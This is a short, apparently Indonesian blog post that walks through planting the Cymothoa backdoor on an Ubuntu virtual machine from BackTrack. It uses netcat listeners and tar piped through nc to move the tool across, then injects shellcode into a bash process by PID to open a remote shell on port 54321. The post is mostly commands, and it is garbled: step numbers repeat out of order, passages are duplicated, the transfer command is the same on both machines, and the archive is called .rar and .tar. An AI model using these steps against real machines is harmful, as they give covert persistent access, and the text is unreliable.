1. RUN cymothoa before that you must Run your Ubuntu on your Virtual BOX
2. RUN NC
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321
root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321
4. root@bt:/pentest/backdoors/cymothoa# nc -l -v -p 54321
3. and now LS in console of BT
we can see, BT can access shell Ubuntu
4. now we must sent cymatho into Ubuntu using nc
Open new terminal
- copy file cymothoa from /pentest/backdoors/cymothoa
root@bt:~# cd /pentest/backdoors/cymothoa/
root@bt:/pentest/backdoors/cymothoa# cp cymothoa /home/
Create file .tar
Create file .tar
root@bt:/home# tar -cvf myfile.tar cymothoa
root@bt:/home# ls
cymothoa myfile.tar tes
OK we have file .rar
we will sent this file.rar into Ubuntu.
root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
and on terminal Ubuntu
root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
Ok transfer file cymothoa SUKSES
Now open terminal BT
5. Ekstrak File .Tar
After that
./cymothoa
root@bt:/home# ls
cymothoa myfile.tar tes
OK we have file .rar
we will sent this file.rar into Ubuntu.
root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
and on terminal Ubuntu
root@bt:/home# tar c /home/ | nc -q 10 -l -p 7878
Ok transfer file cymothoa SUKSES
Now open terminal BT
5. Ekstrak File .Tar
After that
./cymothoa
6. ps -aux
search ID /bin/bash..
. We get ID 1326
7. ./cymothoa -p 1326 -s 0 -y 54321
Ok Success :D
GOOD LUCK
Tidak ada komentar:
Posting Komentar